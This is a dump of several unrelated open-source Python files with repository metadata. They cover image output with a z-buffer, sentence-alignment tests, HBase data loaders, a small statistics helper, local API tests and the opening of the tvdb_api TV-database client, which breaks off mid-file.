a1cc1637f3fb19d41494594668aa7c81e2d8aa00 | 2176442a012a0b73521d04e22bb9186a5e676321 | /display.py | 6a15632aad9ab6623c8adc9e5f6ee7278958dbf0 | [] | no_license | caleb-kahan/z-scan | 5e65c1382f60fed53fc36660ac5d36eecf2709e2 | 0ba703a99496c53a1d813ea0b9fa11679ec38d1f | refs/heads/master | 2022-04-17T08:32:54.662716 | 2020-04-19T00:55:44 | 2020-04-19T00:55:44 | 256,568,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,401 | py | from subprocess import Popen, PIPE
from os import remove
#constants
XRES = 500
YRES = 500
MAX_COLOR = 255
RED = 0
GREEN = 1
BLUE = 2
DEFAULT_COLOR = [0, 0, 0]
def new_screen( width = XRES, height = YRES ):
screen = []
for y in range( height ):
row = []
screen.append( row )
for x in range( width ):
screen[y].append( DEFAULT_COLOR[:] )
return screen
def new_zbuffer( width = XRES, height = YRES ):
zb = []
for y in range( height ):
row = [ float('-inf') for x in range(width) ]
zb.append( row )
return zb
def plot( screen, zbuffer, color, x, y, z ):
newy = YRES - 1 - y
if ( x >= 0 and x < XRES and newy >= 0 and newy < YRES and z > zbuffer[newy][x]):
screen[newy][x] = color[:]
zbuffer[newy][x] = z
def clear_screen( screen ):
for y in range( len(screen) ):
for x in range( len(screen[y]) ):
screen[y][x] = DEFAULT_COLOR[:]
def clear_zbuffer( zb ):
for y in range( len(zb) ):
for x in range( len(zb[y]) ):
zb[y][x] = float('-inf')
def save_ppm( screen, fname ):
f = open( fname, 'wb' )
ppm = 'P6\n' + str(len(screen[0])) +' '+ str(len(screen)) +' '+ str(MAX_COLOR) +'\n'
f.write(ppm.encode())
for y in range( len(screen) ):
for x in range( len(screen[y]) ):
pixel = screen[y][x]
f.write( bytes(pixel) )
f.close()
def save_ppm_ascii( screen, fname ):
f = open( fname, 'w' )
ppm = 'P3\n' + str(len(screen[0])) +' '+ str(len(screen)) +' '+ str(MAX_COLOR) +'\n'
for y in range( len(screen) ):
row = ''
for x in range( len(screen[y]) ):
pixel = screen[y][x]
row+= str( pixel[ RED ] ) + ' '
row+= str( pixel[ GREEN ] ) + ' '
row+= str( pixel[ BLUE ] ) + ' '
ppm+= row + '\n'
f.write( ppm )
f.close()
def save_extension( screen, fname ):
ppm_name = fname[:fname.find('.')] + '.ppm'
save_ppm( screen, ppm_name )
p = Popen( ['convert', ppm_name, fname ], stdin=PIPE, stdout = PIPE )
p.communicate()
remove(ppm_name)
def display( screen ):
ppm_name = 'pic.ppm'
save_ppm( screen, ppm_name )
p = Popen( ['display', ppm_name], stdin=PIPE, stdout = PIPE )
p.communicate()
remove(ppm_name)
| [
"[email protected]"
] | |
d897144be27bc308b3927bb78256939faeaab5ba | 509bf02d033c6a3c274360ab16f75c109a0ba31c | /test/test_hunalign.py | c59304af881eb0c447039bdebeb687d76180c585 | [] | no_license | israaar/textaligner | bb3a6b8210a12799ef40bec44b942f5ca325d2a8 | a03e28cc8264e0c207a7f1b6f56b0dbcc04eeba1 | refs/heads/master | 2022-01-27T14:35:43.553965 | 2019-05-16T07:57:14 | 2019-05-16T07:57:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,470 | py | # -*- coding: utf-8 -*-
import os.path
import unittest
import sys
from pprint import pprint
import operator
sys.path.append(os.path.abspath('..'))
from align import align, align_html
from hunalign import align_with_lang
class TestHunalign(unittest.TestCase):
def setUp(self):
self.maxDiff = None
pass
def testUnalignedText(self):
left_text = \
"""シャーロックホームズにとって、彼女はいつも「あの女」である。ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。
"""
right_text = \
"""TO SHERLOCK HOLMES she is always the woman. I have seldom heard him mention her under any other name. In his eyes she eclipses and predominates the whole of her sex. It was not that he felt any emotion akin to love for Irene Adler. All emotions, and that one particularly, were abhorrent to his cold, precise but admirably balanced mind.
"""
split_text = align(left_text, right_text)
split_text = list(split_text)
self.assertEqual(
split_text,
[('シャーロックホームズにとって、彼女はいつも「あの女」である。',
'TO SHERLOCK HOLMES she is always the woman.'),
('ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。',
'I have seldom heard him mention her under any other name.'),
('彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。',
'In his eyes she eclipses and predominates the whole of her sex.'),
('しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。',
'It was not that he felt any emotion akin to love for Irene Adler.'),
('すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。',
'All emotions, and that one particularly, were abhorrent to his cold, '
'precise but admirably balanced mind.'),
('', '')]
)
def testAlignedText(self):
left_text = \
"""シャーロックホームズにとって、彼女はいつも「あの女」である。
ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。
彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。
しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。
すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。"""
right_text = \
"""TO SHERLOCK HOLMES she is always the woman.
I have seldom heard him mention her under any other name.
In his eyes she eclipses and predominates the whole of her sex.
It was not that he felt any emotion akin to love for Irene Adler.
All emotions, and that one particularly, were abhorrent to his cold, precise but admirably balanced mind."""
split_text = align_with_lang('ja', left_text, 'en', right_text)
split_text = list(split_text)
# pprint(split_text)
self.assertEqual(
split_text,
[('シャーロックホームズにとって、彼女はいつも「あの女」である。',
'TO SHERLOCK HOLMES she is always the woman.'),
('ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。',
'I have seldom heard him mention her under any other name.'),
('彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。',
'In his eyes she eclipses and predominates the whole of her sex.'),
('しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。',
'It was not that he felt any emotion akin to love for Irene Adler.'),
('すべての激情は、そして特に愛というものは、 相容れなかった、彼の冷静で厳格だが見事に調整された心とは。',
'All emotions, and that one particularly, were abhorrent to his cold, '
'precise but admirably balanced mind.')]
)
# pprint(list(split_text))
def testHtmlText(self):
left_text = \
"""シャーロックホームズにとって、彼女はいつも「あの女」である。<br>ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。<br><br>彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。
"""
right_text = \
"""TO SHERLOCK HOLMES she is always the woman.<br>I have seldom heard him mention her under any other name.<br><br>In his eyes she eclipses and predominates the whole of her sex."""
split_text = align_html(left_text, right_text)
split_text = list(split_text)
self.assertEqual(
split_text,
[('シャーロックホームズにとって、彼女はいつも「あの女」である。',
'TO SHERLOCK HOLMES she is always the woman.'),
('ホームズが彼女を他の名前で呼ぶのはほとんど聞いたことがない。',
'I have seldom heard him mention her under any other name.'),
('彼の目には、 彼女がそびえ立って女という性全体を覆い隠している。',
'In his eyes she eclipses and predominates the whole of her sex.'),
('しかし、彼はアイリーン・アドラーに愛のような激情は一切感じていなかった。',
'It was not that he felt any emotion akin to love for Irene Adler.')]
)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestHunalign)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"[email protected]"
] | |
11c22d73f60539e4d366a803c0661c8593aee320 | d889769f22d95d686ffce6564b1a5529e462d770 | /utils/get_data.py | 6bfb524940602e4ebf825f56b25e00790700921d | [] | no_license | ycpan/HbaseOperation | 2051ad1992ca3dd57d8a180d88b56c46549e28ae | 15f470fad590d9f4635d5b38407f8f739bd621f3 | refs/heads/master | 2022-02-13T05:15:18.745507 | 2019-07-09T02:51:40 | 2019-07-09T02:51:40 | 120,189,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,498 | py | import pandas as pd
import pickle
import happybase
import struct
import numpy as np
import sys
# from influxdb import DataFrameClient
import re
import time
from datetime import datetime, timezone, timedelta
# from utils.conf import sql_db_configs
def get_csv_data(path, header=None):
"""load padas dataframe from csv file
Arguments:
path {str} -- filepath of the csv file
Returns:
pandas.DataFrame -- loaded data
"""
return pd.read_csv(path, sep=',', encoding='utf-8', header=header)
def get_pickle_data(path):
"""load data from pickle file
Arguments:
path {str} -- filepath of the pickle file
Returns:
object -- loaded data
"""
with open(path, 'rb') as file:
return pickle.load(file)
def get_df_from_hbase(con, table_name, key, cf='hb', timestamp=None, include_timestamp=False):
"""Read a pandas DataFrame object from HBase table.
Arguments:
con {happybase.Connection} -- HBase connection object
table_name {str} -- HBase table name to read
key {str} -- row key from which the DataFrame should be read
Keyword Arguments:
cf {str} -- Column Family name (default: {'hb'})
Returns:
[pandas.DataFrame] -- Pandas DataFrame object read from HBase
"""
table = con.table(table_name)
column_dtype_key = key + 'columns'
column_dtype = table.row(column_dtype_key, columns=[cf], timestamp=timestamp, include_timestamp=include_timestamp)
columns = {col.decode().split(':')[1]: value.decode() for col, value in column_dtype.items()}
column_order_key = key + 'column_order'
column_order_dict = table.row(column_order_key, columns=[cf], timestamp=timestamp,
include_timestamp=include_timestamp)
column_order = list()
for i in range(len(column_order_dict)):
column_order.append(column_order_dict[bytes(':'.join((cf, str(i))), encoding='utf-8')].decode())
# # row_start = key + 'rows' + struct.pack('>q', 0)
# row_start = key + 'rows' + str(column_order(0))
# # row_end = key + 'rows' + struct.pack('>q', sys.maxint)
# row_end = key + 'rows' + str(column_order[len(column_order) - 1])
row_key_template = key + '_rows_'
# scan_columns = ['{}{}'.format(row_key_template, item) for item in column_order]
HBase_rows = table.scan(row_prefix=bytes(row_key_template, encoding='utf-8'))
# HBase_rows = table.scan(columns='cf:')
df = pd.DataFrame()
for row in HBase_rows:
column_name = row[0].decode().split('_')[len(row[0].decode().split('_')) - 1]
df_column = {key.decode().split(':')[1]: value.decode() for key, value in row[1].items()}
pd_series = pd.Series(df_column)
# df = df.append(df_column, ignore_index=True)
df[column_name] = pd_series
for column, data_type in columns.items():
if len(list(columns.items())) == 1:
column = df.columns[0]
if column == '':
continue
try:
df[column] = pd.to_numeric(df[column])
except ValueError:
pass
df[column] = df[column].astype(np.dtype(data_type))
return df
def get_specify_maximum_version_from_cell(con, table_name, row_key, cf='hb', timestamp=None, include_timestamp=False):
table = con.table(table_name)
cell = table.row(row_key, columns=[cf], timestamp=timestamp, include_timestamp=include_timestamp)
# cell1 = table.cells(row_key, column=cf, versions=5, timestamp=timestamp,
# include_timestamp=True)
type_set = set()
columnsOrder = None
SeriesName = None
columnsType = None
columnsOrder_cf = None
SeriesName_cf = None
columnsType_cf = None
res = None
for cf, value in cell.items():
if len(value) == 2:
value, ts = value
else:
value = value
ts = None
cf_qualifier = cf.decode().split(':')[1]
data_type = cf_qualifier.split('_')[0]
type_set.add(data_type)
data_content = cf_qualifier.split('_')[1]
if data_content == 'columnsOrder':
columnsOrder = eval(value.decode())
columnsOrder_cf = cf
if data_content == 'SeriesName':
SeriesName = value.decode()
SeriesName_cf = cf
if data_content == 'columnsType':
try:
columnsType = eval(value.decode())
except NameError:
columnsType = value.decode()
columnsType_cf = cf
if columnsOrder_cf is not None:
cell.pop(columnsOrder_cf)
if SeriesName_cf is not None:
cell.pop(SeriesName_cf)
if columnsType_cf is not None:
cell.pop(columnsType_cf)
cell_keys = cell.keys()
if columnsOrder_cf in cell_keys or SeriesName_cf in cell_keys or columnsType_cf in cell_keys:
raise ValueError('more than one clean_log input one cell')
# if len(type_set) > 2:
# raise ValueError('more than one clean_log input one cell')
# if len(type_set) >= 2:
# raise ValueError('in one cell may have two data type, this can not deal it')
if 'DataFrame' in type_set:
if len(type_set) > 2:
raise ValueError('in one cell may have two data type, this can not deal it')
res = pd.DataFrame()
for cf, value in cell.items():
if len(value) == 2:
value, _ = value
else:
value = value
cf_qualifier = cf.decode().split(':')[1]
data_index = cf_qualifier.split('_')[1]
value = eval(value.decode())
if 'None' in value:
value = [None if v == 'None' else v for v in value]
df_sub = pd.DataFrame(np.array(value).reshape(1, -1),
columns=columnsOrder, index=[data_index])
res = res.append(df_sub)
for column, data_type in columnsType.items():
if column == '':
continue
try:
res[str(column)] = pd.to_numeric(res[str(column)])
except ValueError:
pass
res[str(column)] = res[str(column)].astype(np.dtype(data_type))
elif 'Series' in type_set:
if len(type_set) > 2:
raise ValueError('in one cell may have two data type, this can not deal it')
res = pd.Series()
for cf, value in cell.items():
if len(value) == 2:
value, _ = value
else:
value = value
cf_qualifier = cf.decode().split(':')[1]
data_index = cf_qualifier.split('_')[1]
df_sub = pd.Series(value.decode(), index=[data_index])
res = res.append(df_sub)
if SeriesName is not None:
res.name = SeriesName
try:
res = pd.to_numeric(res)
except ValueError:
pass
res = res.astype(np.dtype(columnsType))
elif 'dict' in type_set:
if len(type_set) >= 2:
raise ValueError('in one cell may have two data type, this can not deal it')
# for cf, value in cell.items():
if len(value) == 2:
value, _ = value
else:
value = value
res = eval(value.decode())
else:
res = dict()
for cf, value in cell.items():
if len(value) == 2:
value, _ = value
else:
value = value
cf_qualifier = cf.decode().split(':')[1]
data_key = cf_qualifier.split('_')[1]
# value = value.decode()
value = value
try:
value = value.decode()
value = eval(value)
except:
pass
res[data_key] = value
if ts is not None:
return res, ts
return res
def get_specify_versions_data_from_cell(con, table_name, row_key, cf='hb', versions=None, timestamp=None, include_timestamp=False):
table = con.table(table_name)
# cell = table.row(row_key, columns=[cf], timestamp=timestamp, include_timestamp=include_timestamp)
cell = table.cells(row_key, column=cf, versions=versions, timestamp=timestamp,
include_timestamp=True)
ts_set = set()
for _, ts in cell:
ts_set.add(ts)
res = []
for ts in ts_set:
res.append(get_specify_maximum_version_from_cell(con, table_name, row_key, cf, ts+1, include_timestamp))
return res
| [
"[email protected]"
] | |
816403dc9d93b4276bffb4d8e162c51ea13231b8 | 0be45470f15f12872d81f98c72e3b8528100ad27 | /pointCollection/tools/RDE.py | 563e437d633d241e661519931619d6cf3b3cf410 | [
"MIT"
] | permissive | SmithB/pointCollection | 19a43bb19b1753542f693645fe4f537c2dbf7af9 | 026a60eb7e2fbe5333c7a30bd8299dda44c5878e | refs/heads/master | 2023-08-23T18:56:49.943934 | 2023-08-18T16:41:12 | 2023-08-18T16:41:12 | 220,045,965 | 4 | 8 | MIT | 2023-07-03T15:47:58 | 2019-11-06T16:51:04 | Jupyter Notebook | UTF-8 | Python | false | false | 584 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 23 16:31:30 2017
@author: ben
"""
import numpy as np
def RDE(x):
xs=x.copy()
xs=np.isfinite(xs) # this changes xs from values to a boolean
if np.sum(xs)<2 :
return np.nan
ind=np.arange(0.5, np.sum(xs))
LH=np.interp(np.array([0.16, 0.84])*np.sum(xs), ind, np.sort(x[xs]))
#print('LH =',LH)
return (LH[1]-LH[0])/2. # trying to get some kind of a width of the data ~variance
#import scipy.stats as stats
#def RDE(x):
# return (stats.scoreatpercentile(x, 84 )-stats.scoreatpercentile(x, 16))/2. | [
"[email protected]"
] | |
56688f3f32ef27e8f1ae4b5c9144316bdf9ad2cd | 21e2782bb70f183876c55940d7cefc1c82b16472 | /interview/server/tests.py | 066d157435dbd90bf9cbc7cd036fd76f04a93a3a | [] | no_license | RajsimmanRavi/backend-challenge | 13bdc09417fe4d2a7cce54288e27c73c800cf854 | f30860a868493a963ec98fc749b4ae3016a5c766 | refs/heads/master | 2020-08-09T04:29:56.057638 | 2019-10-09T18:53:30 | 2019-10-09T18:53:30 | 213,998,608 | 0 | 0 | null | 2019-10-09T18:50:22 | 2019-10-09T18:50:21 | null | UTF-8 | Python | false | false | 2,011 | py | import requests
import unittest
import random
from random import randint
from datetime import datetime
random.seed(datetime.now())
class TestStringMethods(unittest.TestCase):
def test_get(self):
response = requests.get('http://127.0.0.1:8000/conversations/1234')
self.assertIn("anson", response.text)
def test_get_non_existent(self):
response = requests.get('http://127.0.0.1:8000/conversations/12456')
self.assertIn("matching query does not exist", response.text)
def test_get_non_int(self):
response = requests.get('http://127.0.0.1:8000/conversations/124abc')
self.assertEqual(response.status_code, 404)
def test_get_nothing(self):
response = requests.get('http://127.0.0.1:8000/conversations/')
self.assertEqual(response.status_code, 404)
def test_post(self):
rand_int = str(randint(1000,9999))
data = {"id": rand_int ,"sender": "anson", "message": "I am a coffee pot" }
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("Successfully stored", response.text)
response = requests.get('http://127.0.0.1:8000/conversations/'+rand_int)
self.assertIn("anson", response.text)
def test_post_no_id(self):
data = {"sender": "anson", "message": "I am a coffee pot"}
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("error", response.text)
def test_post_no_sender(self):
data = {"id": "12", "message": "I am a coffee pot"}
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("error", response.text)
def test_post_no_message(self):
data = {"id": "12", "sender": "raj", "message": "I am a coffee pot"}
response = requests.post('http://127.0.0.1:8000/messages/', json=data)
self.assertIn("error", response.text)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
11e480051d1e2e4b524f910449fa7a03d3d0f592 | b3db0cb0849fc3c981077cc5dc071c6eac6fd1ed | /C.1.14.py | f9372e61feee0ec164fad2d51aa25739dd93f3b8 | [] | no_license | Andi-Abdi/Tugas-Struktur-Data | bcfcfd3cf4ac28ce966b30d07041d775b33db778 | 49162ad9c5869161df01bc1a0f8697c2d7d1623a | refs/heads/main | 2023-05-11T11:58:46.484954 | 2021-05-31T14:46:22 | 2021-05-31T14:46:22 | 372,522,215 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | def odd_product_pair(data):
data = set(data)
for y in data:
for x in data:
if y == x :
continue
if y*x % 2 == 1:
return True
return False
print(odd_product_pair([5,7,9,14,16])) | [
"[email protected]"
] | |
35b215ad4099e666c114c8229187f42384aed2ee | 62dcbce52fd9b47f97c8bd8df2f05fbf614d1abd | /ttvdb/tvdb_api.py | 0a08be8cfb5645e6e03b9e9c4eb10664ed74cfbc | [
"MIT"
] | permissive | namgar/mythboxee | e7007e435eea5cd5c74fd31e422bf2a259c6168b | 80129d47a85ad867bc1687958ba23387c705c789 | refs/heads/master | 2021-01-23T20:22:48.516873 | 2010-11-23T02:05:04 | 2010-11-23T02:05:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,282 | py | #!/usr/bin/env python
#encoding:utf-8
#author:dbr/Ben
#project:tvdb_api
#repository:http://github.com/dbr/tvdb_api
#license:Creative Commons GNU GPL v2
# (http://creativecommons.org/licenses/GPL/2.0/)
"""Simple-to-use Python interface to The TVDB's API (www.thetvdb.com)
Example usage:
>>> from tvdb_api import Tvdb
>>> t = Tvdb()
>>> t['Lost'][4][11]['episodename']
u'Cabin Fever'
"""
__author__ = "dbr/Ben"
__version__ = "1.2.1"
import os
import sys
import urllib
import urllib2
import tempfile
import logging
try:
import xml.etree.cElementTree as ElementTree
except ImportError:
import xml.etree.ElementTree as ElementTree
from cache import CacheHandler
from tvdb_ui import BaseUI, ConsoleUI
from tvdb_exceptions import (tvdb_error, tvdb_userabort, tvdb_shownotfound,
tvdb_seasonnotfound, tvdb_episodenotfound, tvdb_attributenotfound)
class ShowContainer(dict):
"""Simple dict that holds a series of Show instances
"""
pass
class Show(dict):
"""Holds a dict of seasons, and show data.
"""
def __init__(self):
dict.__init__(self)
self.data = {}
def __repr__(self):
return "<Show %s (containing %s seasons)>" % (
self.data.get(u'seriesname', 'instance'),
len(self)
)
def __getitem__(self, key):
if key in self:
# Key is an episode, return it
return dict.__getitem__(self, key)
if key in self.data:
# Non-numeric request is for show-data
return dict.__getitem__(self.data, key)
# Data wasn't found, raise appropriate error
if isinstance(key, int) or key.isdigit():
# Episode number x was not found
raise tvdb_seasonnotfound("Could not find season %s" % (repr(key)))
else:
# If it's not numeric, it must be an attribute name, which
# doesn't exist, so attribute error.
raise tvdb_attributenotfound("Cannot find attribute %s" % (repr(key)))
def search(self, term = None, key = None):
"""
Search all episodes in show. Can search all data, or a specific key (for
example, episodename)
Always returns an array (can be empty). First index contains the first
match, and so on.
Each array index is an Episode() instance, so doing
search_results[0]['episodename'] will retrieve the episode name of the
first match.
Search terms are converted to lower case (unicode) strings.
# Examples
These examples assume t is an instance of Tvdb():
>>> t = Tvdb()
>>>
To search for all episodes of Scrubs with a bit of data
containing "my first day":
>>> t['Scrubs'].search("my first day")
[<Episode 01x01 - My First Day>]
>>>
Search for "My Name Is Earl" episode named "Faked His Own Death":
>>> t['My Name Is Earl'].search('Faked His Own Death', key = 'episodename')
[<Episode 01x04 - Faked His Own Death>]
>>>
To search Scrubs for all episodes with "mentor" in the episode name:
>>> t['scrubs'].search('mentor', key = 'episodename')
[<Episode 01x02 - My Mentor>, <Episode 03x15 - My Tormented Mentor>]
>>>
# Using search results
>>> results = t['Scrubs'].search("my first")
>>> print results[0]['episodename']
My First Day
>>> for x in results: print x['episodename']
My First Day
My First Step
My First Kill
>>>
"""
results = []
for cur_season in self.values():
searchresult = cur_season.search(term = term, key = key)
if len(searchresult) != 0:
results.extend(searchresult)
#end for cur_season
return results
class Season(dict):
def __repr__(self):
return "<Season instance (containing %s episodes)>" % (
len(self.keys())
)
def __getitem__(self, episode_number):
if episode_number not in self:
raise tvdb_episodenotfound("Could not find episode %s" % (repr(episode_number)))
else:
return dict.__getitem__(self, episode_number)
def search(self, term = None, key = None):
"""Search all episodes in season, returns a list of matching Episode
instances.
>>> t = Tvdb()
>>> t['scrubs'][1].search('first day')
[<Episode 01x01 - My First Day>]
>>>
See Show.search documentation for further information on search
"""
results = []
for ep in self.values():
searchresult = ep.search(term = term, key = key)
if searchresult is not None:
results.append(
searchresult
)
return results
class Episode(dict):
def __repr__(self):
seasno = int(self.get(u'seasonnumber', 0))
epno = int(self.get(u'episodenumber', 0))
epname = self.get(u'episodename')
if epname is not None:
return "<Episode %02dx%02d - %s>" % (seasno, epno, epname)
else:
return "<Episode %02dx%02d>" % (seasno, epno)
def __getitem__(self, key):
try:
return dict.__getitem__(self, key)
except KeyError:
raise tvdb_attributenotfound("Cannot find attribute %s" % (repr(key)))
def search(self, term = None, key = None):
"""Search episode data for term, if it matches, return the Episode (self).
The key parameter can be used to limit the search to a specific element,
for example, episodename.
This primarily for use use by Show.search and Season.search. See
Show.search for further information on search
Simple example:
>>> e = Episode()
>>> e['episodename'] = "An Example"
>>> e.search("examp")
<Episode 00x00 - An Example>
>>>
Limiting by key:
>>> e.search("examp", key = "episodename")
<Episode 00x00 - An Example>
>>>
"""
if term == None:
raise TypeError("must supply string to search for (contents)")
term = unicode(term).lower()
for cur_key, cur_value in self.items():
cur_key, cur_value = unicode(cur_key).lower(), unicode(cur_value).lower()
if key is not None and cur_key != key:
# Do not search this key
continue
if cur_value.find( unicode(term).lower() ) > -1:
return self
#end if cur_value.find()
#end for cur_key, cur_value
class Actors(list):
"""Holds all Actor instances for a show
"""
pass
class Actor(dict):
"""Represents a single actor. Should contain..
id,
image,
name,
role,
sortorder
"""
def __repr__(self):
return "<Actor \"%s\">" % (self.get("name"))
class Tvdb:
"""Create easy-to-use interface to name of season/episode name
>>> t = Tvdb()
>>> t['Scrubs'][1][24]['episodename']
u'My Last Day'
"""
def __init__(self,
interactive = False,
select_first = False,
debug = False,
cache = True,
banners = False,
actors = False,
custom_ui = None,
language = None,
search_all_languages = False,
apikey = None):
"""interactive (True/False):
When True, uses built-in console UI is used to select the correct show.
When False, the first search result is used.
select_first (True/False):
Automatically selects the first series search result (rather
than showing the user a list of more than one series).
Is overridden by interactive = False, or specifying a custom_ui
debug (True/False):
shows verbose debugging information
cache (True/False/str/unicode):
Retrieved XML are persisted to to disc. If true, stores in tvdb_api
folder under your systems TEMP_DIR, if set to str/unicode instance it
will use this as the cache location. If False, disables caching.
banners (True/False):
Retrieves the banners for a show. These are accessed
via the _banners key of a Show(), for example:
>>> Tvdb(banners=True)['scrubs']['_banners'].keys()
['fanart', 'poster', 'series', 'season']
actors (True/False):
Retrieves a list of the actors for a show. These are accessed
via the _actors key of a Show(), for example:
>>> t = Tvdb(actors=True)
>>> t['scrubs']['_actors'][0]['name']
u'Zach Braff'
custom_ui (tvdb_ui.BaseUI subclass):
A callable subclass of tvdb_ui.BaseUI (overrides interactive option)
language (2 character language abbreviation):
The language of the returned data. Is also the language search
uses. Default is "en" (English). For full list, run..
>>> Tvdb().config['valid_languages'] #doctest: +ELLIPSIS
['da', 'fi', 'nl', ...]
search_all_languages (True/False):
By default, Tvdb will only search in the language specified using
the language option. When this is True, it will search for the
show in and language
apikey (str/unicode):
Override the default thetvdb.com API key. By default it will use
tvdb_api's own key (fine for small scripts), but you can use your
own key if desired - this is recommended if you are embedding
tvdb_api in a larger application)
See http://thetvdb.com/?tab=apiregister to get your own key
"""
self.shows = ShowContainer() # Holds all Show classes
self.corrections = {} # Holds show-name to show_id mapping
self.config = {}
if apikey is not None:
self.config['apikey'] = apikey
else:
self.config['apikey'] = "0629B785CE550C8D" # tvdb_api's API key
self.config['debug_enabled'] = debug # show debugging messages
self.config['custom_ui'] = custom_ui
self.config['interactive'] = interactive # prompt for correct series?
self.config['select_first'] = select_first
self.config['search_all_languages'] = search_all_languages
if cache is True:
self.config['cache_enabled'] = True
self.config['cache_location'] = self._getTempDir()
elif isinstance(cache, basestring):
self.config['cache_enabled'] = True
self.config['cache_location'] = cache
else:
self.config['cache_enabled'] = False
if self.config['cache_enabled']:
self.urlopener = urllib2.build_opener(
CacheHandler(self.config['cache_location'])
)
else:
self.urlopener = urllib2.build_opener()
self.config['banners_enabled'] = banners
self.config['actors_enabled'] = actors
self.log = self._initLogger() # Setups the logger (self.log.debug() etc)
# List of language from http://www.thetvdb.com/api/0629B785CE550C8D/languages.xml
# Hard-coded here as it is realtively static, and saves another HTTP request, as
# recommended on http://thetvdb.com/wiki/index.php/API:languages.xml
self.config['valid_languages'] = [
"da", "fi", "nl", "de", "it", "es", "fr","pl", "hu","el","tr",
"ru","he","ja","pt","zh","cs","sl", "hr","ko","en","sv","no"
]
if language is None:
self.config['language'] = "en"
elif language not in self.config['valid_languages']:
raise ValueError("Invalid language %s, options are: %s" % (
language, self.config['valid_languages']
))
else:
self.config['language'] = language
# The following url_ configs are based of the
# http://thetvdb.com/wiki/index.php/Programmers_API
self.config['base_url'] = "http://www.thetvdb.com"
if self.config['search_all_languages']:
self.config['url_getSeries'] = "%(base_url)s/api/GetSeries.php?seriesname=%%s&language=all" % self.config
else:
self.config['url_getSeries'] = "%(base_url)s/api/GetSeries.php?seriesname=%%s&language=%(language)s" % self.config
self.config['url_epInfo'] = "%(base_url)s/api/%(apikey)s/series/%%s/all/%(language)s.xml" % self.config
self.config['url_seriesInfo'] = "%(base_url)s/api/%(apikey)s/series/%%s/%(language)s.xml" % self.config
self.config['url_actorsInfo'] = "%(base_url)s/api/%(apikey)s/series/%%s/actors.xml" % self.config
self.config['url_seriesBanner'] = "%(base_url)s/api/%(apikey)s/series/%%s/banners.xml" % self.config
self.config['url_artworkPrefix'] = "%(base_url)s/banners/%%s" % self.config
#end __init__
def _initLogger(self):
"""Setups a logger using the logging module, returns a log object
"""
logger = logging.getLogger("tvdb")
formatter = logging.Formatter('%(asctime)s) %(levelname)s %(message)s')
hdlr = logging.StreamHandler(sys.stdout)
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
if self.config['debug_enabled']:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
return logger
#end initLogger
def _getTempDir(self):
"""Returns the [system temp dir]/tvdb_api
"""
import mc
return mc.GetTempDir()
return os.path.join(tempfile.gettempdir(), "tvdb_api")
def _loadUrl(self, url, recache = False):
try:
self.log.debug("Retrieving URL %s" % url)
resp = self.urlopener.open(url)
if 'x-local-cache' in resp.headers:
self.log.debug("URL %s was cached in %s" % (
url,
resp.headers['x-local-cache'])
)
if recache:
self.log.debug("Attempting to recache %s" % url)
resp.recache()
except urllib2.URLError, errormsg:
raise tvdb_error("Could not connect to server: %s" % (errormsg))
#end try
return resp.read()
def _getetsrc(self, url):
"""Loads a URL sing caching, returns an ElementTree of the source
"""
src = self._loadUrl(url)
try:
return ElementTree.fromstring(src)
except SyntaxError:
src = self._loadUrl(url, recache=True)
try:
return ElementTree.fromstring(src)
except SyntaxError, exceptionmsg:
errormsg = "There was an error with the XML retrieved from thetvdb.com:\n%s" % (
exceptionmsg
)
if self.config['cache_enabled']:
errormsg += "\nFirst try emptying the cache folder at..\n%s" % (
self.config['cache_location']
)
errormsg += "\nIf this does not resolve the issue, please try again later. If the error persists, report a bug on"
errormsg += "\nhttp://dbr.lighthouseapp.com/projects/13342-tvdb_api/overview\n"
raise tvdb_error(errormsg)
#end _getetsrc
def _setItem(self, sid, seas, ep, attrib, value):
"""Creates a new episode, creating Show(), Season() and
Episode()s as required. Called by _getShowData to populute
Since the nice-to-use tvdb[1][24]['name] interface
makes it impossible to do tvdb[1][24]['name] = "name"
and still be capable of checking if an episode exists
so we can raise tvdb_shownotfound, we have a slightly
less pretty method of setting items.. but since the API
is supposed to be read-only, this is the best way to
do it!
The problem is that calling tvdb[1][24]['episodename'] = "name"
calls __getitem__ on tvdb[1], there is no way to check if
tvdb.__dict__ should have a key "1" before we auto-create it
"""
if sid not in self.shows:
self.shows[sid] = Show()
if seas not in self.shows[sid]:
self.shows[sid][seas] = Season()
if ep not in self.shows[sid][seas]:
self.shows[sid][seas][ep] = Episode()
self.shows[sid][seas][ep][attrib] = value
#end _set_item
def _setShowData(self, sid, key, value):
"""Sets self.shows[sid] to a new Show instance, or sets the data
"""
if sid not in self.shows:
self.shows[sid] = Show()
self.shows[sid].data[key] = value
def _cleanData(self, data):
